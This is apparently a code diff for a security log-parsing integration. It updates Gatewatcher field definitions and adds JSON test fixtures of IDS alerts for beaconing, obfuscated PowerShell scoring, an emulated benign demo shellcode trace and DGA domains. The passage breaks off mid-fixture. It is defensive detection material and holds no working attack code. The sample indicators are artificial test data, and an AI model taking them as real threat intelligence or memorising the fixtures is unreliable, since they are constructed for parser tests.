   description: rfb client_protocol_version field
   name: gatewatcher.rfb.client_protocol_version
   type: text
+
 gatewatcher.rfb.server_protocol_version:
   description: rfb server_protocol_version field
   name: gatewatcher.rfb.server_protocol_version
   type: text
+
 gatewatcher.rfb.server_security_failure_reason:
   description: rfb server_security_failure_reason field
   name: gatewatcher.rfb.server_security_failure_reason
   type: text
+
 gatewatcher.shellcode.analysis:
   description: shellcode analysis field
   name: gatewatcher.shellcode.analysis
   type: text
+
 gatewatcher.shellcode.encodings:
   description: shellcode encodings field
   name: gatewatcher.shellcode.encodings
   type: text
+
 gatewatcher.shellcode.id:
   description: shellcode id field
   name: gatewatcher.shellcode.id
   type: text
+
 gatewatcher.shellcode.sample_id:
   description: shellcode sample_id field
   name: gatewatcher.shellcode.sample_id
   type: text
+
 gatewatcher.shellcode.sub_type:
   description: shellcode sub_type field
   name: gatewatcher.shellcode.sub_type
   type: text
+
 gatewatcher.sigflow.action:
   description: sigflow action field
   name: gatewatcher.sigflow.action
   type: text
+
 gatewatcher.sigflow.category:
   description: sigflow category field
   name: gatewatcher.sigflow.category
   type: text
+
 gatewatcher.sigflow.gid:
   description: sigflow gid field
   name: gatewatcher.sigflow.gid
   type: number
+
 gatewatcher.sigflow.metadata:
   description: sigflow metadata field
   name: gatewatcher.sigflow.metadata
   type: text
+
 gatewatcher.sigflow.packet:
   description: sigflow packet field
   name: gatewatcher.sigflow.packet
   type: text
+
 gatewatcher.sigflow.packet_info:
   description: sigflow packet_info field
   name: gatewatcher.sigflow.packet_info
   type: text
+
 gatewatcher.sigflow.payload:
   description: sigflow payload field
   name: gatewatcher.sigflow.payload
   type: text
+
 gatewatcher.sigflow.payload_printable:
   description: sigflow payload_printable field
   name: gatewatcher.sigflow.payload_printable
   type: text
+
 gatewatcher.sigflow.rev:
   description: sigflow rev field
   name: gatewatcher.sigflow.rev
   type: number
+
 gatewatcher.sigflow.signature:
   description: sigflow signature field
   name: gatewatcher.sigflow.signature
   type: text
+
 gatewatcher.sigflow.signature_id:
   description: sigflow signature_id field
   name: gatewatcher.sigflow.signature_id
   type: number
+
 gatewatcher.sigflow.stream:
   description: sigflow stream field
   name: gatewatcher.sigflow.stream
   type: number
+
 gatewatcher.sip.method:
   description: sip method field
   name: gatewatcher.sip.method
   type: text
+
 gatewatcher.sip.request_line:
   description: sip request_line field
   name: gatewatcher.sip.request_line
   type: text
+
 gatewatcher.sip.uri:
   description: sip uri field
   name: gatewatcher.sip.uri
   type: text
+
 gatewatcher.sip.version:
   description: sip version field
   name: gatewatcher.sip.version
   type: text
-gatewatcher.smb:
-  description: smb metadata field
-  name: gatewatcher.smb
-  type: text
+
 gatewatcher.smb.command:
   description: smb command field
   name: gatewatcher.smb.command
   type: text
+
 gatewatcher.smb.dialect:
   description: smb dialect field
   name: gatewatcher.smb.dialect
   type: text
+
 gatewatcher.smb.id:
   description: smb id field
   name: gatewatcher.smb.id
   type: number
+
 gatewatcher.smb.session_id:
   description: smb session id field
   name: gatewatcher.smb.session_id
   type: number
+
 gatewatcher.smb.status:
   description: smb status field
   name: gatewatcher.smb.status
   type: text
+
 gatewatcher.smb.status_code:
   description: smb status_code field
   name: gatewatcher.smb.status_code
   type: text
+
 gatewatcher.smb.tree_id:
   description: smb tree_id field
   name: gatewatcher.smb.tree_id
   type: number
+
 gatewatcher.smtp.helo:
   description: smtp helo field
   name: gatewatcher.smtp.helo
   type: text
+
 gatewatcher.smtp.mail_from:
   description: smtp mail from field
   name: gatewatcher.smtp.mail_from
   type: text
+
 gatewatcher.smtp.rcpt_to:
   description: smtp recipients field
   name: gatewatcher.smtp.rcpt_to
   type: text
+
 gatewatcher.snmp.community:
   description: snmp community field
   name: gatewatcher.snmp.community
   type: text
+
 gatewatcher.snmp.pdu_type:
   description: snmp pdu_type field
   name: gatewatcher.snmp.pdu_type
   type: text
+
 gatewatcher.snmp.vars:
   description: snmp vars field
   name: gatewatcher.snmp.vars
   type: text
+
 gatewatcher.snmp.version:
   description: snmp version field
   name: gatewatcher.snmp.version
   type: number
+
 gatewatcher.ssh.client.hassh:
   description: ssh client hassh field
   name: gatewatcher.ssh.client.hassh
   type: text
+
 gatewatcher.ssh.client.proto_version:
   description: ssh client proto_version field
   name: gatewatcher.ssh.client.proto_version
   type: text
+
 gatewatcher.ssh.client.software_version:
   description: ssh client software_version field
   name: gatewatcher.ssh.client.software_version
   type: text
+
 gatewatcher.ssh.server.hassh:
   description: ssh server hassh field
   name: gatewatcher.ssh.server.hassh
   type: text
+
 gatewatcher.ssh.server.proto_version:
   description: ssh server proto_version field
   name: gatewatcher.ssh.server.proto_version
   type: text
+
 gatewatcher.ssh.server.software_version:
   description: ssh server software_version field
   name: gatewatcher.ssh.server.software_version
   type: text
-gatewatcher.state:
-  description: Analysis result
-  name: gatewatcher.state
-  type: keyword
+
 gatewatcher.syslog.message:
   description: syslog message field
   name: gatewatcher.syslog.message
   type: text
+
 gatewatcher.tftp.file:
   description: tftp file field
   name: gatewatcher.tftp.file
   type: text
+
 gatewatcher.tftp.mode:
   description: tftp mode field
   name: gatewatcher.tftp.mode
   type: text
+
 gatewatcher.tftp.packet:
   description: tftp packet field
   name: gatewatcher.tftp.packet
   type: text
-gatewatcher.timestamp_analyzed:
-  description: Timestamp of the alert processing by gcenter
-  name: gatewatcher.timestamp_analyzed
-  type: keyword
-gatewatcher.timestamp_detected:
-  description: Timestamp of the file collection by gcap
-  name: gatewatcher.timestamp_detected
-  type: keyword
+
 gatewatcher.tls:
   description: TLS meta data field
   name: gatewatcher.tls
   type: text
-gatewatcher.type:
-  description: Type of analysis
-  name: gatewatcher.type
-  type: keyword
+
 gatewatcher.user_agent.major:
   description: user_agent major field
   name: gatewatcher.user_agent.major
   type: text
+
 gatewatcher.user_agent.minor:
   description: user_agent minor field
   name: gatewatcher.user_agent.minor
   type: text
+
 gatewatcher.user_agent.os.major:
   description: user_agent os major field
   name: gatewatcher.user_agent.os.major
   type: text
-gatewatcher.user_agent.os.patch:
-  description: user_agent os patch field
-  name: gatewatcher.user_agent.os.patch
+
+gatewatcher.user_agent.patch:
+  description: user_agent patch field
+  name: gatewatcher.user_agent.patch
   type: text
+
 gatewatcher.version:
   description: '@version field'
   name: gatewatcher.version
diff --git a/GateWatcher/aioniq_ecs/tests/beacon_event.json b/GateWatcher/aioniq_ecs/tests/beacon_event.json
new file mode 100644
index 000000000..3626c4db0
--- /dev/null
+++ b/GateWatcher/aioniq_ecs/tests/beacon_event.json
@@ -0,0 +1,92 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Gatewatcher AionIQ V103",
+        "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680"
+      }
+    },
+    "message": "{\n  \"tls\": {\n    \"client\": {\n      \"server_name\": \"cisco-update.com\"\n    }\n  },\n  \"@version\": \"1\",\n  \"event\": {\n    \"created\": \"2024-09-09T13:02:34.254441+00:00\",\n    \"end\": \"2024-09-09T11:52:25.666000+00:00\",\n    \"severity\": 3,\n    \"module\": \"beacon_detect\",\n    \"start\": \"2024-09-09T11:47:44.012000+00:00\",\n    \"category\": [\n      \"network\",\n      \"intrusion_detection\"\n    ],\n    \"kind\": \"alert\",\n    \"id\": \"5e7bb104-6493-43b2-be4d-f7c28ce79e85\",\n    \"dataset\": \"alert\"\n  },\n  \"source\": {\n    \"ip\": \"10.0.0.60\",\n    \"mac\": \"60:57:18:e9:4f:5d\"\n  },\n  \"beacon\": {\n    \"mean_time_interval\": 1,\n    \"active\": true,\n    \"possible_cnc\": \"not_recognized\",\n    \"session_count\": 260,\n    \"type\": \"constant\",\n    \"id\": \"c4c886b4ad\",\n    \"hostname_resolution\": \"not_analyzed\"\n  },\n  \"destination\": {\n    \"ip\": \"157.230.93.100\",\n    \"port\": 443\n  },\n  \"observer\": {\n    \"product\": \"gcenter\",\n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n    \"log_format_version\": \"1.0.0\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n    \"gcap\": {\n      \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n      \"version\": \"2.5.4.0-rc1\"\n    },\n    \"version\": \"2.5.3.103\",\n    \"vendor\": \"gatewatcher\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"@timestamp\": \"2024-09-09T13:02:59.354490664Z\",\n  \"url\": {\n    \"domain\": \"cisco-update.com\"\n  },\n  \"network\": {\n    \"protocol\": \"tls\",\n    \"timestamp\": \"2024-09-09T11:47:44.012000+00:00\",\n    \"transport\": \"tcp\"\n  }\n}"
+  },
+  "expected": {
+    "message": "{\n  \"tls\": {\n    \"client\": {\n      \"server_name\": \"cisco-update.com\"\n    }\n  },\n  \"@version\": \"1\",\n  \"event\": {\n    \"created\": \"2024-09-09T13:02:34.254441+00:00\",\n    \"end\": \"2024-09-09T11:52:25.666000+00:00\",\n    \"severity\": 3,\n    \"module\": \"beacon_detect\",\n    \"start\": \"2024-09-09T11:47:44.012000+00:00\",\n    \"category\": [\n      \"network\",\n      \"intrusion_detection\"\n    ],\n    \"kind\": \"alert\",\n    \"id\": \"5e7bb104-6493-43b2-be4d-f7c28ce79e85\",\n    \"dataset\": \"alert\"\n  },\n  \"source\": {\n    \"ip\": \"10.0.0.60\",\n    \"mac\": \"60:57:18:e9:4f:5d\"\n  },\n  \"beacon\": {\n    \"mean_time_interval\": 1,\n    \"active\": true,\n    \"possible_cnc\": \"not_recognized\",\n    \"session_count\": 260,\n    \"type\": \"constant\",\n    \"id\": \"c4c886b4ad\",\n    \"hostname_resolution\": \"not_analyzed\"\n  },\n  \"destination\": {\n    \"ip\": \"157.230.93.100\",\n    \"port\": 443\n  },\n  \"observer\": {\n    \"product\": \"gcenter\",\n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n    \"log_format_version\": \"1.0.0\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n    \"gcap\": {\n      \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n      \"version\": \"2.5.4.0-rc1\"\n    },\n    \"version\": \"2.5.3.103\",\n    \"vendor\": \"gatewatcher\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"@timestamp\": \"2024-09-09T13:02:59.354490664Z\",\n  \"url\": {\n    \"domain\": \"cisco-update.com\"\n  },\n  \"network\": {\n    \"protocol\": \"tls\",\n    \"timestamp\": \"2024-09-09T11:47:44.012000+00:00\",\n    \"transport\": \"tcp\"\n  }\n}",
+    "event": {
+      "category": [
+        "intrusion_detection",
+        "network"
+      ],
+      "dataset": "alert",
+      "kind": "alert",
+      "module": "beacon_detect",
+      "severity": 3
+    },
+    "@timestamp": "2024-09-09T13:02:59.354490Z",
+    "destination": {
+      "address": "157.230.93.100",
+      "ip": "157.230.93.100",
+      "port": 443
+    },
+    "gatewatcher": {
+      "beacon": {
+        "active": "true",
+        "hostname_resolution": "not_analyzed",
+        "mean_time_interval": "1",
+        "possible_cnc": "not_recognized",
+        "session_count": "260",
+        "type": "constant"
+      },
+      "event": {
+        "created": "2024-09-09T13:02:34.254441Z",
+        "id": "5e7bb104-6493-43b2-be4d-f7c28ce79e85"
+      },
+      "network": {
+        "timestamp": "2024-09-09T11:47:44.012000Z"
+      },
+      "observer": {
+        "gcap": {
+          "hostname": "gcap-clement-l.gatewatcher.fr",
+          "version": "2.5.4.0-rc1"
+        },
+        "log_format_version": "1.0.0",
+        "uuid": "78f4fed1-c9ad-52b9-b509-6b87767f501f"
+      },
+      "tls": "{\"client\": {\"server_name\": \"cisco-update.com\"}}",
+      "version": "1"
+    },
+    "network": {
+      "protocol": "tls",
+      "transport": "tcp"
+    },
+    "observer": {
+      "hostname": "gcenter-clelyo-01.gatewatcher.com",
+      "product": "gcenter",
+      "vendor": "gatewatcher",
+      "version": "2.5.3.103"
+    },
+    "related": {
+      "hosts": [
+        "cisco-update.com",
+        "gcenter-clelyo-01.gatewatcher.com"
+      ],
+      "ip": [
+        "10.0.0.60",
+        "157.230.93.100"
+      ]
+    },
+    "source": {
+      "address": "10.0.0.60",
+      "ip": "10.0.0.60",
+      "mac": "60:57:18:e9:4f:5d"
+    },
+    "tls": {
+      "client": {
+        "server_name": "cisco-update.com"
+      }
+    },
+    "url": {
+      "domain": "cisco-update.com",
+      "registered_domain": "cisco-update.com",
+      "top_level_domain": "com"
+    }
+  }
+}
\ No newline at end of file
diff --git a/GateWatcher/aioniq_ecs/tests/codebreaker_powershell_alert.json b/GateWatcher/aioniq_ecs/tests/codebreaker_powershell_alert.json
new file mode 100644
index 000000000..d6d87aeb8
--- /dev/null
+++ b/GateWatcher/aioniq_ecs/tests/codebreaker_powershell_alert.json
@@ -0,0 +1,85 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Gatewatcher AionIQ V103",
+        "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680"
+      }
+    },
+    "message": "{\n  \"observer\": {\n    \"vendor\": \"gatewatcher\",\n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n    \"gcap\": {\n      \"ingress\": {\n        \"interface\": {\n          \"name\": \"monvirt\"\n        }\n      },\n      \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n      \"version\": \"2.5.4.0-rc1\"\n    },\n    \"version\": \"2.5.3.103\",\n    \"log_format_version\": \"1.0.0\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n    \"product\": \"gcenter\"\n  },\n  \"network\": {\n    \"protocol\": \"unknown\",\n    \"transport\": \"tcp\",\n    \"timestamp\": \"2024-09-11T09:10:46.975548+0000\",\n    \"flow_id\": 779924698221176\n  },\n  \"source\": {\n    \"port\": 35444,\n    \"ip\": \"10.127.0.111\"\n  },\n  \"destination\": {\n    \"port\": 4242,\n    \"ip\": \"10.127.0.222\"\n  },\n  \"malicious_powershell\": {\n    \"proba_obfuscated\": 1,\n    \"score\": 1890,\n    \"sample_id\": \"09-11-2024T09:11:49_5a4a9ad809c84969b7f2bac324e41554_gcap-clement-l.gatewatcher.fr\",\n    \"id\": \"60b656e17bec0a97f5638790c78a3124\",\n    \"score_details\": {\n      \"StrReplace\": 0,\n      \"StreamReader\": 0,\n      \"StartBitsTransfer\": 0,\n      \"InvokeRestMethod\": 0,\n      \"Base64\": 1520,\n      \"StreamWriter\": 0,\n      \"InvokeExpression\": 0,\n      \"SystemIOFile\": 0,\n      \"StrJoin\": 0,\n      \"StrCat\": 370,\n      \"WebClientInvokation\": 0,\n      \"GetContent\": 0,\n      \"FmtStr\": 0,\n      \"CharInt\": 0,\n      \"InvokeWebRequest\": 0,\n      \"AddContent\": 0,\n      \"SetContent\": 0\n    }\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"@timestamp\": \"2024-09-11T09:11:52.737102768Z\",\n  \"@version\": \"1\",\n  \"event\": {\n    \"id\": \"de7b5e80-a4b2-4ed6-b566-3590945e34d5\",\n    \"kind\": \"alert\",\n    \"module\": \"malicious_powershell_detect\",\n    \"severity\": 1,\n    \"dataset\": \"alert\",\n    \"category\": [\n      \"network\",\n      \"intrusion_detection\"\n    ],\n    \"created\": \"2024-09-11T09:11:52.735668+0000\"\n  }\n}"
+  },
+  "expected": {
+    "message": "{\n  \"observer\": {\n    \"vendor\": \"gatewatcher\",\n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n    \"gcap\": {\n      \"ingress\": {\n        \"interface\": {\n          \"name\": \"monvirt\"\n        }\n      },\n      \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n      \"version\": \"2.5.4.0-rc1\"\n    },\n    \"version\": \"2.5.3.103\",\n    \"log_format_version\": \"1.0.0\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n    \"product\": \"gcenter\"\n  },\n  \"network\": {\n    \"protocol\": \"unknown\",\n    \"transport\": \"tcp\",\n    \"timestamp\": \"2024-09-11T09:10:46.975548+0000\",\n    \"flow_id\": 779924698221176\n  },\n  \"source\": {\n    \"port\": 35444,\n    \"ip\": \"10.127.0.111\"\n  },\n  \"destination\": {\n    \"port\": 4242,\n    \"ip\": \"10.127.0.222\"\n  },\n  \"malicious_powershell\": {\n    \"proba_obfuscated\": 1,\n    \"score\": 1890,\n    \"sample_id\": \"09-11-2024T09:11:49_5a4a9ad809c84969b7f2bac324e41554_gcap-clement-l.gatewatcher.fr\",\n    \"id\": \"60b656e17bec0a97f5638790c78a3124\",\n    \"score_details\": {\n      \"StrReplace\": 0,\n      \"StreamReader\": 0,\n      \"StartBitsTransfer\": 0,\n      \"InvokeRestMethod\": 0,\n      \"Base64\": 1520,\n      \"StreamWriter\": 0,\n      \"InvokeExpression\": 0,\n      \"SystemIOFile\": 0,\n      \"StrJoin\": 0,\n      \"StrCat\": 370,\n      \"WebClientInvokation\": 0,\n      \"GetContent\": 0,\n      \"FmtStr\": 0,\n      \"CharInt\": 0,\n      \"InvokeWebRequest\": 0,\n      \"AddContent\": 0,\n      \"SetContent\": 0\n    }\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"@timestamp\": \"2024-09-11T09:11:52.737102768Z\",\n  \"@version\": \"1\",\n  \"event\": {\n    \"id\": \"de7b5e80-a4b2-4ed6-b566-3590945e34d5\",\n    \"kind\": \"alert\",\n    \"module\": \"malicious_powershell_detect\",\n    \"severity\": 1,\n    \"dataset\": \"alert\",\n    \"category\": [\n      \"network\",\n      \"intrusion_detection\"\n    ],\n    \"created\": \"2024-09-11T09:11:52.735668+0000\"\n  }\n}",
+    "event": {
+      "category": [
+        "intrusion_detection",
+        "network"
+      ],
+      "dataset": "alert",
+      "kind": "alert",
+      "module": "malicious_powershell_detect",
+      "severity": 1
+    },
+    "@timestamp": "2024-09-11T09:11:52.737102Z",
+    "destination": {
+      "address": "10.127.0.222",
+      "ip": "10.127.0.222",
+      "port": 4242
+    },
+    "gatewatcher": {
+      "event": {
+        "created": "2024-09-11T09:11:52.735668Z",
+        "id": "de7b5e80-a4b2-4ed6-b566-3590945e34d5"
+      },
+      "malicious_powershell": {
+        "id": "60b656e17bec0a97f5638790c78a3124",
+        "proba_obfuscated": 1,
+        "sample_id": "09-11-2024T09:11:49_5a4a9ad809c84969b7f2bac324e41554_gcap-clement-l.gatewatcher.fr",
+        "score": 1890,
+        "score_details": "{\"AddContent\": 0, \"Base64\": 1520, \"CharInt\": 0, \"FmtStr\": 0, \"GetContent\": 0, \"InvokeExpression\": 0, \"InvokeRestMethod\": 0, \"InvokeWebRequest\": 0, \"SetContent\": 0, \"StartBitsTransfer\": 0, \"StrCat\": 370, \"StrJoin\": 0, \"StrReplace\": 0, \"StreamReader\": 0, \"StreamWriter\": 0, \"SystemIOFile\": 0, \"WebClientInvokation\": 0}"
+      },
+      "network": {
+        "flow_id": 779924698221176,
+        "timestamp": "2024-09-11T09:10:46.975548Z"
+      },
+      "observer": {
+        "gcap": {
+          "hostname": "gcap-clement-l.gatewatcher.fr",
+          "ingress": {
+            "interface": {
+              "name": "monvirt"
+            }
+          },
+          "version": "2.5.4.0-rc1"
+        },
+        "log_format_version": "1.0.0",
+        "uuid": "78f4fed1-c9ad-52b9-b509-6b87767f501f"
+      },
+      "version": "1"
+    },
+    "network": {
+      "protocol": "unknown",
+      "transport": "tcp"
+    },
+    "observer": {
+      "hostname": "gcenter-clelyo-01.gatewatcher.com",
+      "product": "gcenter",
+      "vendor": "gatewatcher",
+      "version": "2.5.3.103"
+    },
+    "related": {
+      "hosts": [
+        "gcenter-clelyo-01.gatewatcher.com"
+      ],
+      "ip": [
+        "10.127.0.111",
+        "10.127.0.222"
+      ]
+    },
+    "source": {
+      "address": "10.127.0.111",
+      "ip": "10.127.0.111",
+      "port": 35444
+    }
+  }
+}
\ No newline at end of file
diff --git a/GateWatcher/aioniq_ecs/tests/codebreaker_shellcode_alert.json b/GateWatcher/aioniq_ecs/tests/codebreaker_shellcode_alert.json
new file mode 100644
index 000000000..048d8d91d
--- /dev/null
+++ b/GateWatcher/aioniq_ecs/tests/codebreaker_shellcode_alert.json
@@ -0,0 +1,92 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Gatewatcher AionIQ V103",
+        "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680"
+      }
+    },
+    "message": "{\n  \"network\": {\n    \"protocol\": \"unknown\",\n    \"timestamp\": \"2024-09-11T15:35:30.167846+0000\",\n    \"transport\": \"tcp\",\n    \"flow_id\": 888739207482646\n  },\n  \"observer\": {\n    \"vendor\": \"gatewatcher\",\n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n    \"gcap\": {\n      \"ingress\": {\n        \"interface\": {\n          \"name\": \"monvirt\"\n        }\n      },\n      \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n      \"version\": \"2.5.4.0-rc1\"\n    },\n    \"version\": \"2.5.3.103\",\n    \"log_format_version\": \"1.0.0\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n    \"product\": \"gcenter\"\n  },\n  \"destination\": {\n    \"port\": 6666,\n    \"ip\": \"178.160.128.2\"\n  },\n  \"source\": {\n    \"port\": 60078,\n    \"ip\": \"80.15.17.183\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"shellcode\": {\n    \"sub_type\": \"Windows_x86_32\",\n    \"encodings\": [\n      {\n        \"name\": \"Bloxor\",\n        \"count\": 4\n      }\n    ],\n    \"sample_id\": \"09-11-2024T15:36:31_8608eb20e6844d2786d36811f92a673b_gcap-clement-l.gatewatcher.fr\",\n    \"analysis\": [\n      {\n        \"call\": \"kernel32_LoadLibraryA\",\n        \"args\": \"{lpFileName: user32.dll}\",\n        \"_id\": 0,\n        \"ret\": \"0x70600000\"\n      },\n      {\n        \"call\": \"user32_MessageBoxA\",\n        \"args\": \"{hWnd: None, lpText: Do you like GateWatcher ?, lpCaption: Gatewatcher2018, uType: [MB_OK, MB_ICONQUESTION, MB_DEFBUTTON1, MB_APPLMODAL, None]}\",\n        \"_id\": 1,\n        \"ret\": \"1\"\n      },\n      {\n        \"call\": \"kernel32_ExitProcess\",\n        \"args\": \"{uExitCode: 0}\",\n        \"_id\": 2,\n        \"ret\": \"0\"\n      },\n      {\n        \"info\": \"Stop : End of shellcode (Exit)\",\n        \"_id\": -1\n      }\n    ],\n    \"id\": \"790a2aa742e1da23e14c9b7270ee81a1\"\n  },\n  \"@timestamp\": \"2024-09-11T15:36:36.071882055Z\",\n  \"@version\": \"1\",\n  \"event\": {\n    \"dataset\": \"alert\",\n    \"kind\": \"alert\",\n    \"module\": \"shellcode_detect\",\n    \"category\": [\n      \"network\",\n      \"intrusion_detection\"\n    ],\n    \"severity\": 1,\n    \"id\": \"8c03d100-794f-45fe-8d92-7409c925b255\",\n    \"created\": \"2024-09-11T15:36:36.068564+0000\"\n  }\n}"
+  },
+  "expected": {
+    "message": "{\n  \"network\": {\n    \"protocol\": \"unknown\",\n    \"timestamp\": \"2024-09-11T15:35:30.167846+0000\",\n    \"transport\": \"tcp\",\n    \"flow_id\": 888739207482646\n  },\n  \"observer\": {\n    \"vendor\": \"gatewatcher\",\n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n    \"gcap\": {\n      \"ingress\": {\n        \"interface\": {\n          \"name\": \"monvirt\"\n        }\n      },\n      \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n      \"version\": \"2.5.4.0-rc1\"\n    },\n    \"version\": \"2.5.3.103\",\n    \"log_format_version\": \"1.0.0\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n    \"product\": \"gcenter\"\n  },\n  \"destination\": {\n    \"port\": 6666,\n    \"ip\": \"178.160.128.2\"\n  },\n  \"source\": {\n    \"port\": 60078,\n    \"ip\": \"80.15.17.183\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"shellcode\": {\n    \"sub_type\": \"Windows_x86_32\",\n    \"encodings\": [\n      {\n        \"name\": \"Bloxor\",\n        \"count\": 4\n      }\n    ],\n    \"sample_id\": \"09-11-2024T15:36:31_8608eb20e6844d2786d36811f92a673b_gcap-clement-l.gatewatcher.fr\",\n    \"analysis\": [\n      {\n        \"call\": \"kernel32_LoadLibraryA\",\n        \"args\": \"{lpFileName: user32.dll}\",\n        \"_id\": 0,\n        \"ret\": \"0x70600000\"\n      },\n      {\n        \"call\": \"user32_MessageBoxA\",\n        \"args\": \"{hWnd: None, lpText: Do you like GateWatcher ?, lpCaption: Gatewatcher2018, uType: [MB_OK, MB_ICONQUESTION, MB_DEFBUTTON1, MB_APPLMODAL, None]}\",\n        \"_id\": 1,\n        \"ret\": \"1\"\n      },\n      {\n        \"call\": \"kernel32_ExitProcess\",\n        \"args\": \"{uExitCode: 0}\",\n        \"_id\": 2,\n        \"ret\": \"0\"\n      },\n      {\n        \"info\": \"Stop : End of shellcode (Exit)\",\n        \"_id\": -1\n      }\n    ],\n    \"id\": \"790a2aa742e1da23e14c9b7270ee81a1\"\n  },\n  \"@timestamp\": \"2024-09-11T15:36:36.071882055Z\",\n  \"@version\": \"1\",\n  \"event\": {\n    \"dataset\": \"alert\",\n    \"kind\": \"alert\",\n    \"module\": \"shellcode_detect\",\n    \"category\": [\n      \"network\",\n      \"intrusion_detection\"\n    ],\n    \"severity\": 1,\n    \"id\": \"8c03d100-794f-45fe-8d92-7409c925b255\",\n    \"created\": \"2024-09-11T15:36:36.068564+0000\"\n  }\n}",
+    "event": {
+      "category": [
+        "intrusion_detection",
+        "network"
+      ],
+      "dataset": "alert",
+      "kind": "alert",
+      "module": "shellcode_detect",
+      "severity": 1
+    },
+    "@timestamp": "2024-09-11T15:36:36.071882Z",
+    "destination": {
+      "address": "178.160.128.2",
+      "ip": "178.160.128.2",
+      "port": 6666
+    },
+    "gatewatcher": {
+      "event": {
+        "created": "2024-09-11T15:36:36.068564Z",
+        "id": "8c03d100-794f-45fe-8d92-7409c925b255"
+      },
+      "network": {
+        "flow_id": 888739207482646,
+        "timestamp": "2024-09-11T15:35:30.167846Z"
+      },
+      "observer": {
+        "gcap": {
+          "hostname": "gcap-clement-l.gatewatcher.fr",
+          "ingress": {
+            "interface": {
+              "name": "monvirt"
+            }
+          },
+          "version": "2.5.4.0-rc1"
+        },
+        "log_format_version": "1.0.0",
+        "uuid": "78f4fed1-c9ad-52b9-b509-6b87767f501f"
+      },
+      "shellcode": {
+        "analysis": [
+          "{\"_id\": -1, \"info\": \"Stop : End of shellcode (Exit)\"}",
+          "{\"_id\": 0, \"args\": \"{lpFileName: user32.dll}\", \"call\": \"kernel32_LoadLibraryA\", \"ret\": \"0x70600000\"}",
+          "{\"_id\": 1, \"args\": \"{hWnd: None, lpText: Do you like GateWatcher ?, lpCaption: Gatewatcher2018, uType: [MB_OK, MB_ICONQUESTION, MB_DEFBUTTON1, MB_APPLMODAL, None]}\", \"call\": \"user32_MessageBoxA\", \"ret\": \"1\"}",
+          "{\"_id\": 2, \"args\": \"{uExitCode: 0}\", \"call\": \"kernel32_ExitProcess\", \"ret\": \"0\"}"
+        ],
+        "encodings": [
+          "{\"count\": 4, \"name\": \"Bloxor\"}"
+        ],
+        "id": "790a2aa742e1da23e14c9b7270ee81a1",
+        "sample_id": "09-11-2024T15:36:31_8608eb20e6844d2786d36811f92a673b_gcap-clement-l.gatewatcher.fr",
+        "sub_type": "Windows_x86_32"
+      },
+      "version": "1"
+    },
+    "network": {
+      "protocol": "unknown",
+      "transport": "tcp"
+    },
+    "observer": {
+      "hostname": "gcenter-clelyo-01.gatewatcher.com",
+      "product": "gcenter",
+      "vendor": "gatewatcher",
+      "version": "2.5.3.103"
+    },
+    "related": {
+      "hosts": [
+        "gcenter-clelyo-01.gatewatcher.com"
+      ],
+      "ip": [
+        "178.160.128.2",
+        "80.15.17.183"
+      ]
+    },
+    "source": {
+      "address": "80.15.17.183",
+      "ip": "80.15.17.183",
+      "port": 60078
+    }
+  }
+}
\ No newline at end of file
diff --git a/GateWatcher/aioniq_ecs/tests/dga_event.json b/GateWatcher/aioniq_ecs/tests/dga_event.json
new file mode 100644
index 000000000..fab96a746
--- /dev/null
+++ b/GateWatcher/aioniq_ecs/tests/dga_event.json
@@ -0,0 +1,90 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Gatewatcher AionIQ V103",
+        "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680"
+      }
+    },
+    "message": "{\n  \"network\": {\n    \"protocol\": \"dns\",\n    \"transport\": \"udp\",\n    \"timestamp\": \"2024-09-11T09:15:25.886786+00:00\",\n    \"flow_id\": 1434780527372168\n  },\n  \"observer\": {\n    \"vendor\": \"gatewatcher\",\n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n    \"gcap\": {\n      \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n      \"version\": \"2.5.4.0-rc1\"\n    },\n    \"version\": \"2.5.3.103\",\n    \"log_format_version\": \"1.0.0\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n    \"product\": \"gcenter\"\n  },\n  \"source\": {\n    \"ip\": \"27.0.0.227\"\n  },\n  \"destination\": {\n    \"port\": 53,\n    \"ip\": \"202.129.215.23\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"dga\": {\n    \"dga_count\": 35,\n    \"dga_ratio\": 0.97,\n    \"malware_behavior_confidence\": 50,\n    \"nx_domain_count\": 36,\n    \"top_DGA\": [\n      \"zmhaoyukbol6a.com\",\n 